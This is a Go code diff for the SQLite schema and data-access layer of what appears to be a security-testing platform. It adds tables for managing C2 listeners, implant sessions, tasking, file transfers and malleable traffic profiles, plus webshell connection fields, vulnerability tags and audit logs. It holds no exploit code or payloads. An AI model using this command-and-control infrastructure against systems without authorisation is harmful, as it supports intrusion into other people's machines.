ID string `json:"id"` ID string `json:"id"`
MessageID string `json:"messageId"` MessageID string `json:"messageId"`
ConversationID string `json:"conversationId"` ConversationID string `json:"conversationId"`
EventType string `json:"eventType"` // iteration, thinking, tool_calls_detected, tool_call, tool_result, progress, error EventType string `json:"eventType"` // iteration, thinking, reasoning_chain, tool_calls_detected, tool_call, tool_result, progress, error
Message string `json:"message"` Message string `json:"message"`
Data string `json:"data"` // JSON格式的数据 Data string `json:"data"` // JSON格式的数据
CreatedAt time.Time `json:"createdAt"` CreatedAt time.Time `json:"createdAt"`
@@ -0,0 +1,29 @@
package database
// ConversationCreateMeta describes how a conversation was created (for audit hooks).
type ConversationCreateMeta struct {
Source string
WebShellConnectionID string
ClientIP string
SessionHint string
}
// ConversationCreateHook is invoked after a conversation row is inserted.
type ConversationCreateHook func(conv *Conversation, meta ConversationCreateMeta)
var conversationCreateHook ConversationCreateHook
// SetConversationCreateHook registers a global hook (e.g. platform audit).
func SetConversationCreateHook(h ConversationCreateHook) {
conversationCreateHook = h
}
func notifyConversationCreated(conv *Conversation, meta ConversationCreateMeta) {
if conversationCreateHook == nil || conv == nil {
return
}
if meta.Source == "" {
meta.Source = "unknown"
}
conversationCreateHook(conv, meta)
}
+314 -2
View File
@@ -3,6 +3,8 @@ package database
import ( import (
"database/sql" "database/sql"
"fmt" "fmt"
"os"
"path/filepath"
"strings" "strings"
"time" "time"
@@ -21,7 +23,8 @@ func configureDBPool(db *sql.DB) {
// DB 数据库连接 // DB 数据库连接
type DB struct { type DB struct {
*sql.DB *sql.DB
logger *zap.Logger logger *zap.Logger
conversationArtifactsDir string
} }
// NewDB 创建数据库连接 // NewDB 创建数据库连接
@@ -41,6 +44,13 @@ func NewDB(dbPath string, logger *zap.Logger) (*DB, error) {
DB: db, DB: db,
logger: logger, logger: logger,
} }
// Keep conversation-scoped artifacts near database files, so cleanup can follow conversation lifecycle.
baseDir := filepath.Join(filepath.Dir(dbPath), "conversation_artifacts")
if mkErr := os.MkdirAll(baseDir, 0o755); mkErr == nil {
database.conversationArtifactsDir = baseDir
} else if logger != nil {
logger.Warn("创建 conversation artifacts 目录失败", zap.String("dir", baseDir), zap.Error(mkErr))
}
// 初始化表 // 初始化表
if err := database.initTables(); err != nil { if err := database.initTables(); err != nil {
@@ -52,7 +62,7 @@ func NewDB(dbPath string, logger *zap.Logger) (*DB, error) {
// initTables 初始化数据库表 // initTables 初始化数据库表
func (db *DB) initTables() error { func (db *DB) initTables() error {
// 创建对话表 // 创建对话表last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库)
createConversationsTable := ` createConversationsTable := `
CREATE TABLE IF NOT EXISTS conversations ( CREATE TABLE IF NOT EXISTS conversations (
id TEXT PRIMARY KEY, id TEXT PRIMARY KEY,
@@ -72,6 +82,7 @@ func (db *DB) initTables() error {
content TEXT NOT NULL, content TEXT NOT NULL,
mcp_execution_ids TEXT, mcp_execution_ids TEXT,
created_at DATETIME NOT NULL, created_at DATETIME NOT NULL,
updated_at DATETIME NOT NULL,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
);` );`
@@ -192,11 +203,23 @@ func (db *DB) initTables() error {
UNIQUE(conversation_id, group_id) UNIQUE(conversation_id, group_id)
);` );`
// 机器人会话绑定表(用于跨重启保持「平台+租户+用户」到 conversation 的映射)
createRobotUserSessionsTable := `
CREATE TABLE IF NOT EXISTS robot_user_sessions (
session_key TEXT PRIMARY KEY,
conversation_id TEXT NOT NULL,
role_name TEXT NOT NULL DEFAULT '默认',
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
);`
// 创建漏洞表 // 创建漏洞表
createVulnerabilitiesTable := ` createVulnerabilitiesTable := `
CREATE TABLE IF NOT EXISTS vulnerabilities ( CREATE TABLE IF NOT EXISTS vulnerabilities (
id TEXT PRIMARY KEY, id TEXT PRIMARY KEY,
conversation_id TEXT NOT NULL, conversation_id TEXT NOT NULL,
conversation_tag TEXT,
task_tag TEXT,
title TEXT NOT NULL, title TEXT NOT NULL,
description TEXT, description TEXT,
severity TEXT NOT NULL, severity TEXT NOT NULL,
@@ -257,6 +280,8 @@ func (db *DB) initTables() error {
method TEXT NOT NULL DEFAULT 'post', method TEXT NOT NULL DEFAULT 'post',
cmd_param TEXT NOT NULL DEFAULT '', cmd_param TEXT NOT NULL DEFAULT '',
remark TEXT NOT NULL DEFAULT '', remark TEXT NOT NULL DEFAULT '',
encoding TEXT NOT NULL DEFAULT '',
os TEXT NOT NULL DEFAULT '',
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);` );`
@@ -269,6 +294,131 @@ func (db *DB) initTables() error {
FOREIGN KEY (connection_id) REFERENCES webshell_connections(id) ON DELETE CASCADE FOREIGN KEY (connection_id) REFERENCES webshell_connections(id) ON DELETE CASCADE
);` );`
// ========================================================================
// C2 模块(监听器 / 会话 / 任务 / 文件 / 事件 / Malleable Profile
// ========================================================================
createC2ListenersTable := `
CREATE TABLE IF NOT EXISTS c2_listeners (
id TEXT PRIMARY KEY,
name TEXT NOT NULL,
type TEXT NOT NULL,
bind_host TEXT NOT NULL DEFAULT '127.0.0.1',
bind_port INTEGER NOT NULL,
profile_id TEXT,
encryption_key TEXT NOT NULL DEFAULT '',
implant_token TEXT NOT NULL DEFAULT '',
status TEXT NOT NULL DEFAULT 'stopped',
config_json TEXT NOT NULL DEFAULT '{}',
remark TEXT NOT NULL DEFAULT '',
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
started_at DATETIME,
last_error TEXT
);`
createC2SessionsTable := `
CREATE TABLE IF NOT EXISTS c2_sessions (
id TEXT PRIMARY KEY,
listener_id TEXT NOT NULL,
implant_uuid TEXT NOT NULL UNIQUE,
hostname TEXT,
username TEXT,
os TEXT,
arch TEXT,
pid INTEGER DEFAULT 0,
process_name TEXT,
is_admin INTEGER DEFAULT 0,
internal_ip TEXT,
external_ip TEXT,
user_agent TEXT,
sleep_seconds INTEGER NOT NULL DEFAULT 5,
jitter_percent INTEGER NOT NULL DEFAULT 0,
status TEXT NOT NULL DEFAULT 'active',
first_seen_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
last_check_in DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
metadata_json TEXT DEFAULT '{}',
note TEXT NOT NULL DEFAULT '',
FOREIGN KEY (listener_id) REFERENCES c2_listeners(id) ON DELETE CASCADE
);`
createC2TasksTable := `
CREATE TABLE IF NOT EXISTS c2_tasks (
id TEXT PRIMARY KEY,
session_id TEXT NOT NULL,
task_type TEXT NOT NULL,
payload_json TEXT NOT NULL DEFAULT '{}',
status TEXT NOT NULL DEFAULT 'queued',
result_text TEXT,
result_blob_path TEXT,
error TEXT,
source TEXT NOT NULL DEFAULT 'manual',
conversation_id TEXT,
approval_status TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
sent_at DATETIME,
started_at DATETIME,
completed_at DATETIME,
duration_ms INTEGER DEFAULT 0,
FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE
);`
createC2FilesTable := `
CREATE TABLE IF NOT EXISTS c2_files (
id TEXT PRIMARY KEY,
session_id TEXT NOT NULL,
task_id TEXT,
direction TEXT NOT NULL,
remote_path TEXT NOT NULL,
local_path TEXT NOT NULL,
size_bytes INTEGER DEFAULT 0,
sha256 TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE
);`
createC2EventsTable := `
CREATE TABLE IF NOT EXISTS c2_events (
id TEXT PRIMARY KEY,
level TEXT NOT NULL DEFAULT 'info',
category TEXT NOT NULL,
session_id TEXT,
task_id TEXT,
message TEXT NOT NULL,
data_json TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);`
createAuditLogsTable := `
CREATE TABLE IF NOT EXISTS audit_logs (
id TEXT PRIMARY KEY,
created_at DATETIME NOT NULL,
level TEXT NOT NULL DEFAULT 'info',
category TEXT NOT NULL,
action TEXT NOT NULL,
result TEXT NOT NULL,
actor TEXT NOT NULL DEFAULT 'admin',
session_hint TEXT,
client_ip TEXT,
user_agent TEXT,
resource_type TEXT,
resource_id TEXT,
message TEXT NOT NULL,
detail_json TEXT
);`
createC2ProfilesTable := `
CREATE TABLE IF NOT EXISTS c2_profiles (
id TEXT PRIMARY KEY,
name TEXT NOT NULL UNIQUE,
user_agent TEXT,
uris_json TEXT NOT NULL DEFAULT '[]',
request_headers_json TEXT,
response_headers_json TEXT,
body_template TEXT,
jitter_min_ms INTEGER DEFAULT 0,
jitter_max_ms INTEGER DEFAULT 0,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);`
// 创建索引 // 创建索引
createIndexes := ` createIndexes := `
CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id); CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id);
@@ -287,8 +437,11 @@ func (db *DB) initTables() error {
CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_created_at ON knowledge_retrieval_logs(created_at); CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_created_at ON knowledge_retrieval_logs(created_at);
CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_conversation ON conversation_group_mappings(conversation_id); CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_conversation ON conversation_group_mappings(conversation_id);
CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_group ON conversation_group_mappings(group_id); CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_group ON conversation_group_mappings(group_id);
CREATE INDEX IF NOT EXISTS idx_robot_user_sessions_updated_at ON robot_user_sessions(updated_at);
CREATE INDEX IF NOT EXISTS idx_conversations_pinned ON conversations(pinned); CREATE INDEX IF NOT EXISTS idx_conversations_pinned ON conversations(pinned);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at);
@@ -297,6 +450,23 @@ func (db *DB) initTables() error {
CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title); CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title);
CREATE INDEX IF NOT EXISTS idx_webshell_connections_created_at ON webshell_connections(created_at); CREATE INDEX IF NOT EXISTS idx_webshell_connections_created_at ON webshell_connections(created_at);
CREATE INDEX IF NOT EXISTS idx_webshell_connection_states_updated_at ON webshell_connection_states(updated_at); CREATE INDEX IF NOT EXISTS idx_webshell_connection_states_updated_at ON webshell_connection_states(updated_at);
CREATE INDEX IF NOT EXISTS idx_c2_listeners_created_at ON c2_listeners(created_at);
CREATE INDEX IF NOT EXISTS idx_c2_listeners_status ON c2_listeners(status);
CREATE INDEX IF NOT EXISTS idx_c2_sessions_listener ON c2_sessions(listener_id);
CREATE INDEX IF NOT EXISTS idx_c2_sessions_status ON c2_sessions(status);
CREATE INDEX IF NOT EXISTS idx_c2_sessions_last_check_in ON c2_sessions(last_check_in);
CREATE INDEX IF NOT EXISTS idx_c2_tasks_session ON c2_tasks(session_id);
CREATE INDEX IF NOT EXISTS idx_c2_tasks_status ON c2_tasks(status);
CREATE INDEX IF NOT EXISTS idx_c2_tasks_created_at ON c2_tasks(created_at);
CREATE INDEX IF NOT EXISTS idx_c2_tasks_conversation ON c2_tasks(conversation_id);
CREATE INDEX IF NOT EXISTS idx_c2_files_session ON c2_files(session_id);
CREATE INDEX IF NOT EXISTS idx_c2_events_created_at ON c2_events(created_at);
CREATE INDEX IF NOT EXISTS idx_c2_events_category ON c2_events(category);
CREATE INDEX IF NOT EXISTS idx_c2_events_session ON c2_events(session_id);
CREATE INDEX IF NOT EXISTS idx_audit_logs_created_at ON audit_logs(created_at);
CREATE INDEX IF NOT EXISTS idx_audit_logs_category ON audit_logs(category);
CREATE INDEX IF NOT EXISTS idx_audit_logs_action ON audit_logs(action);
CREATE INDEX IF NOT EXISTS idx_audit_logs_result ON audit_logs(result);
` `
if _, err := db.Exec(createConversationsTable); err != nil { if _, err := db.Exec(createConversationsTable); err != nil {
@@ -342,6 +512,9 @@ func (db *DB) initTables() error {
if _, err := db.Exec(createConversationGroupMappingsTable); err != nil { if _, err := db.Exec(createConversationGroupMappingsTable); err != nil {
return fmt.Errorf("创建conversation_group_mappings表失败: %w", err) return fmt.Errorf("创建conversation_group_mappings表失败: %w", err)
} }
if _, err := db.Exec(createRobotUserSessionsTable); err != nil {
return fmt.Errorf("创建robot_user_sessions表失败: %w", err)
}
if _, err := db.Exec(createVulnerabilitiesTable); err != nil { if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
return fmt.Errorf("创建vulnerabilities表失败: %w", err) return fmt.Errorf("创建vulnerabilities表失败: %w", err)
@@ -363,12 +536,34 @@ func (db *DB) initTables() error {
return fmt.Errorf("创建webshell_connection_states表失败: %w", err) return fmt.Errorf("创建webshell_connection_states表失败: %w", err)
} }
if _, err := db.Exec(createAuditLogsTable); err != nil {
return fmt.Errorf("创建audit_logs表失败: %w", err)
}
for tableName, ddl := range map[string]string{
"c2_listeners": createC2ListenersTable,
"c2_sessions": createC2SessionsTable,
"c2_tasks": createC2TasksTable,
"c2_files": createC2FilesTable,
"c2_events": createC2EventsTable,
"c2_profiles": createC2ProfilesTable,
} {
if _, err := db.Exec(ddl); err != nil {
return fmt.Errorf("创建%s表失败: %w", tableName, err)
}
}
// 为已有表添加新字段(如果不存在)- 必须在创建索引之前 // 为已有表添加新字段(如果不存在)- 必须在创建索引之前
if err := db.migrateConversationsTable(); err != nil { if err := db.migrateConversationsTable(); err != nil {
db.logger.Warn("迁移conversations表失败", zap.Error(err)) db.logger.Warn("迁移conversations表失败", zap.Error(err))
// 不返回错误,允许继续运行 // 不返回错误,允许继续运行
} }
if err := db.migrateMessagesTable(); err != nil {
db.logger.Warn("迁移messages表失败", zap.Error(err))
// 不返回错误,允许继续运行
}
if err := db.migrateConversationGroupsTable(); err != nil { if err := db.migrateConversationGroupsTable(); err != nil {
db.logger.Warn("迁移conversation_groups表失败", zap.Error(err)) db.logger.Warn("迁移conversation_groups表失败", zap.Error(err))
// 不返回错误,允许继续运行 // 不返回错误,允许继续运行
@@ -383,6 +578,15 @@ func (db *DB) initTables() error {
db.logger.Warn("迁移batch_task_queues表失败", zap.Error(err)) db.logger.Warn("迁移batch_task_queues表失败", zap.Error(err))
// 不返回错误,允许继续运行 // 不返回错误,允许继续运行
} }
if err := db.migrateVulnerabilitiesTable(); err != nil {
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
// 不返回错误,允许继续运行
}
if err := db.migrateWebshellConnectionsTable(); err != nil {
db.logger.Warn("迁移webshell_connections表失败", zap.Error(err))
// 不返回错误,允许继续运行
}
if _, err := db.Exec(createIndexes); err != nil { if _, err := db.Exec(createIndexes); err != nil {
return fmt.Errorf("创建索引失败: %w", err) return fmt.Errorf("创建索引失败: %w", err)
@@ -392,6 +596,52 @@ func (db *DB) initTables() error {
return nil return nil
} }
// migrateMessagesTable 迁移 messages 表,补充 updated_at 字段。
// 语义:updated_at 表示该条消息最后一次被写入/更新的时间(例如助手占位消息在任务结束时更新正文)。
func (db *DB) migrateMessagesTable() error {
var count int
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='updated_at'").Scan(&count)
if err != nil {
// 如果查询失败,尝试添加字段
if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); addErr != nil {
errMsg := strings.ToLower(addErr.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
return fmt.Errorf("添加 messages.updated_at 字段失败: %w", addErr)
}
}
} else if count == 0 {
if _, err := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); err != nil {
errMsg := strings.ToLower(err.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
return fmt.Errorf("添加 messages.updated_at 字段失败: %w", err)
}
}
}
// 回填已有数据:让 updated_at 至少等于 created_at,避免前端出现空/当前时间回退。
_, _ = db.Exec("UPDATE messages SET updated_at = created_at WHERE updated_at IS NULL OR updated_at = ''")
// reasoning_contentDeepSeek 思考模式 + 工具调用续跑;与 last_react_input 互补,供消息表回退路径回放
var rcColCount int
errRC := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='reasoning_content'").Scan(&rcColCount)
if errRC != nil {
if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); addErr != nil {
errMsg := strings.ToLower(addErr.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", addErr)
}
}
} else if rcColCount == 0 {
if _, err := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); err != nil {
errMsg := strings.ToLower(err.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", err)
}
}
}
return nil
}
// migrateConversationsTable 迁移conversations表,添加新字段 // migrateConversationsTable 迁移conversations表,添加新字段
func (db *DB) migrateConversationsTable() error { func (db *DB) migrateConversationsTable() error {
// 检查last_react_input字段是否存在 // 检查last_react_input字段是否存在
@@ -683,6 +933,68 @@ func (db *DB) migrateBatchTaskQueuesTable() error {
return nil return nil
} }
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
func (db *DB) migrateVulnerabilitiesTable() error {
columns := []struct {
name string
stmt string
}{
{name: "conversation_tag", stmt: "ALTER TABLE vulnerabilities ADD COLUMN conversation_tag TEXT"},
{name: "task_tag", stmt: "ALTER TABLE vulnerabilities ADD COLUMN task_tag TEXT"},
}
for _, col := range columns {
var count int
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('vulnerabilities') WHERE name=?", col.name).Scan(&count)
if err != nil {
if _, addErr := db.Exec(col.stmt); addErr != nil {
errMsg := strings.ToLower(addErr.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
db.logger.Warn("添加vulnerabilities字段失败", zap.String("field", col.name), zap.Error(addErr))
}
}
continue
}
if count == 0 {
if _, addErr := db.Exec(col.stmt); addErr != nil {
db.logger.Warn("添加vulnerabilities字段失败", zap.String("field", col.name), zap.Error(addErr))
}
}
}
return nil
}
// migrateWebshellConnectionsTable 迁移 webshell_connections 表,补充新字段
func (db *DB) migrateWebshellConnectionsTable() error {
columns := []struct {
name string
stmt string
}{
{name: "encoding", stmt: "ALTER TABLE webshell_connections ADD COLUMN encoding TEXT NOT NULL DEFAULT ''"},
{name: "os", stmt: "ALTER TABLE webshell_connections ADD COLUMN os TEXT NOT NULL DEFAULT ''"},
}
for _, col := range columns {
var count int
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('webshell_connections') WHERE name=?", col.name).Scan(&count)
if err != nil {
if _, addErr := db.Exec(col.stmt); addErr != nil {
errMsg := strings.ToLower(addErr.Error())
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr))
}
}
continue
}
if count == 0 {
if _, addErr := db.Exec(col.stmt); addErr != nil {
db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr))
}
}
}
return nil
}
// NewKnowledgeDB 创建知识库数据库连接(只包含知识库相关的表) // NewKnowledgeDB 创建知识库数据库连接(只包含知识库相关的表)
func NewKnowledgeDB(dbPath string, logger *zap.Logger) (*DB, error) { func NewKnowledgeDB(dbPath string, logger *zap.Logger) (*DB, error) {
sqlDB, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1&_busy_timeout=5000&_synchronous=NORMAL") sqlDB, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1&_busy_timeout=5000&_synchronous=NORMAL")
@@ -0,0 +1,28 @@
package database
import (
"fmt"
"strings"
)
// DedupeConsecutiveProcessDetails 去掉相邻且语义相同的过程详情(使用 DB 中 data 列原始 JSON 作指纹,避免 map 序列化键序不稳定)。
func DedupeConsecutiveProcessDetails(rows []ProcessDetail) []ProcessDetail {
if len(rows) < 2 {
return rows
}
out := make([]ProcessDetail, 0, len(rows))
var lastKey string
for _, d := range rows {
key := processDetailRowKey(d)
if len(out) > 0 && key != "" && key == lastKey {
continue
}
out = append(out, d)
lastKey = key
}
return out
}
func processDetailRowKey(d ProcessDetail) string {
return fmt.Sprintf("%s\x00%s\x00%s", d.EventType, strings.TrimSpace(d.Message), d.Data)
}
+84
View File
@@ -0,0 +1,84 @@
package database
import (
"database/sql"
"fmt"
"strings"
"time"
)
// RobotSessionBinding 机器人会话绑定信息。
type RobotSessionBinding struct {
SessionKey string
ConversationID string
RoleName string
UpdatedAt time.Time
}
// GetRobotSessionBinding 按 session_key 获取机器人会话绑定。
func (db *DB) GetRobotSessionBinding(sessionKey string) (*RobotSessionBinding, error) {
sessionKey = strings.TrimSpace(sessionKey)
if sessionKey == "" {
return nil, nil
}
var b RobotSessionBinding
var updatedAt string
err := db.QueryRow(
"SELECT session_key, conversation_id, role_name, updated_at FROM robot_user_sessions WHERE session_key = ?",
sessionKey,
).Scan(&b.SessionKey, &b.ConversationID, &b.RoleName, &updatedAt)
if err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, fmt.Errorf("查询机器人会话绑定失败: %w", err)
}
if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt); e == nil {
b.UpdatedAt = t
} else if t, e := time.Parse("2006-01-02 15:04:05", updatedAt); e == nil {
b.UpdatedAt = t
} else {
b.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
}
if strings.TrimSpace(b.RoleName) == "" {
b.RoleName = "默认"
}
return &b, nil
}
// UpsertRobotSessionBinding 写入或更新机器人会话绑定(包含角色)。
func (db *DB) UpsertRobotSessionBinding(sessionKey, conversationID, roleName string) error {
sessionKey = strings.TrimSpace(sessionKey)
conversationID = strings.TrimSpace(conversationID)
roleName = strings.TrimSpace(roleName)
if sessionKey == "" || conversationID == "" {
return nil
}
if roleName == "" {
roleName = "默认"
}
_, err := db.Exec(`
INSERT INTO robot_user_sessions (session_key, conversation_id, role_name, updated_at)
VALUES (?, ?, ?, ?)
ON CONFLICT(session_key) DO UPDATE SET
conversation_id = excluded.conversation_id,
role_name = excluded.role_name,
updated_at = excluded.updated_at
`, sessionKey, conversationID, roleName, time.Now())
if err != nil {
return fmt.Errorf("写入机器人会话绑定失败: %w", err)
}
return nil
}
// DeleteRobotSessionBinding 删除机器人会话绑定。
func (db *DB) DeleteRobotSessionBinding(sessionKey string) error {
sessionKey = strings.TrimSpace(sessionKey)
if sessionKey == "" {
return nil
}
if _, err := db.Exec("DELETE FROM robot_user_sessions WHERE session_key = ?", sessionKey); err != nil {
return fmt.Errorf("删除机器人会话绑定失败: %w", err)
}
return nil
}
+161 -64
View File
@@ -3,16 +3,92 @@ package database
import ( import (
"database/sql" "database/sql"
"fmt" "fmt"
"strings"
"time" "time"
"github.com/google/uuid" "github.com/google/uuid"
"go.uber.org/zap" "go.uber.org/zap"
) )
// VulnerabilityListFilter 列表/统计/导出共用的筛选条件
type VulnerabilityListFilter struct {
ID string
Search string // 关键词模糊匹配(标题、描述、类型、目标等)
ConversationID string
Severity string
Status string
TaskID string
ConversationTag string
TaskTag string
}
func escapeVulnerabilityLikePattern(s string) string {
s = strings.ReplaceAll(s, `\`, `\\`)
s = strings.ReplaceAll(s, `%`, `\%`)
s = strings.ReplaceAll(s, `_`, `\_`)
return "%" + s + "%"
}
func (f VulnerabilityListFilter) appendWhere(query string, args []interface{}) (string, []interface{}) {
if f.ID != "" {
query += " AND id = ?"
args = append(args, f.ID)
}
if f.ConversationID != "" {
query += " AND conversation_id = ?"
args = append(args, f.ConversationID)
}
if f.TaskID != "" {
query += " AND EXISTS (SELECT 1 FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id AND (bt.id = ? OR bt.queue_id = ?))"
args = append(args, f.TaskID, f.TaskID)
}
if f.ConversationTag != "" {
query += " AND conversation_tag = ?"
args = append(args, f.ConversationTag)
}
if f.TaskTag != "" {
query += " AND task_tag = ?"
args = append(args, f.TaskTag)
}
if f.Severity != "" {
query += " AND severity = ?"
args = append(args, f.Severity)
}
if f.Status != "" {
query += " AND status = ?"
args = append(args, f.Status)
}
search := strings.TrimSpace(f.Search)
if search != "" {
pattern := escapeVulnerabilityLikePattern(search)
query += ` AND (
LOWER(id) LIKE LOWER(?) OR
LOWER(title) LIKE LOWER(?) OR
LOWER(COALESCE(description, '')) LIKE LOWER(?) OR
LOWER(COALESCE(vulnerability_type, '')) LIKE LOWER(?) OR
LOWER(COALESCE(target, '')) LIKE LOWER(?) OR
LOWER(COALESCE(proof, '')) LIKE LOWER(?) OR
LOWER(COALESCE(impact, '')) LIKE LOWER(?) OR
LOWER(COALESCE(recommendation, '')) LIKE LOWER(?) OR
LOWER(COALESCE(conversation_id, '')) LIKE LOWER(?) OR
LOWER(COALESCE(conversation_tag, '')) LIKE LOWER(?) OR
LOWER(COALESCE(task_tag, '')) LIKE LOWER(?)
)`
for i := 0; i < 11; i++ {
args = append(args, pattern)
}
}
return query, args
}
// Vulnerability 漏洞 // Vulnerability 漏洞
type Vulnerability struct { type Vulnerability struct {
ID string `json:"id"` ID string `json:"id"`
ConversationID string `json:"conversation_id"` ConversationID string `json:"conversation_id"`
ConversationTag string `json:"conversation_tag,omitempty"`
TaskTag string `json:"task_tag,omitempty"`
TaskID string `json:"task_id,omitempty"`
TaskQueueID string `json:"task_queue_id,omitempty"`
Title string `json:"title"` Title string `json:"title"`
Description string `json:"description"` Description string `json:"description"`
Severity string `json:"severity"` // critical, high, medium, low, info Severity string `json:"severity"` // critical, high, medium, low, info
@@ -42,15 +118,15 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
query := ` query := `
INSERT INTO vulnerabilities ( INSERT INTO vulnerabilities (
id, conversation_id, title, description, severity, status, id, conversation_id, conversation_tag, task_tag, title, description, severity, status,
vulnerability_type, target, proof, impact, recommendation, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at created_at, updated_at
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
` `
_, err := db.Exec( _, err := db.Exec(
query, query,
vuln.ID, vuln.ConversationID, vuln.Title, vuln.Description, vuln.ID, vuln.ConversationID, vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
vuln.Severity, vuln.Status, vuln.Type, vuln.Target, vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
vuln.Proof, vuln.Impact, vuln.Recommendation, vuln.Proof, vuln.Impact, vuln.Recommendation,
vuln.CreatedAt, vuln.UpdatedAt, vuln.CreatedAt, vuln.UpdatedAt,
@@ -67,7 +143,9 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
var vuln Vulnerability var vuln Vulnerability
query := ` query := `
SELECT id, conversation_id, title, description, severity, status, SELECT id, conversation_id, title, description, severity, status,
vulnerability_type, target, proof, impact, recommendation, conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
created_at, updated_at created_at, updated_at
FROM vulnerabilities FROM vulnerabilities
WHERE id = ? WHERE id = ?
@@ -75,8 +153,9 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
err := db.QueryRow(query, id).Scan( err := db.QueryRow(query, id).Scan(
&vuln.ID, &vuln.ConversationID, &vuln.Title, &vuln.Description, &vuln.ID, &vuln.ConversationID, &vuln.Title, &vuln.Description,
&vuln.Severity, &vuln.Status, &vuln.Type, &vuln.Target, &vuln.Severity, &vuln.Status, &vuln.ConversationTag, &vuln.TaskTag, &vuln.Type, &vuln.Target,
&vuln.Proof, &vuln.Impact, &vuln.Recommendation, &vuln.Proof, &vuln.Impact, &vuln.Recommendation,
&vuln.TaskID, &vuln.TaskQueueID,
&vuln.CreatedAt, &vuln.UpdatedAt, &vuln.CreatedAt, &vuln.UpdatedAt,
) )
if err != nil { if err != nil {
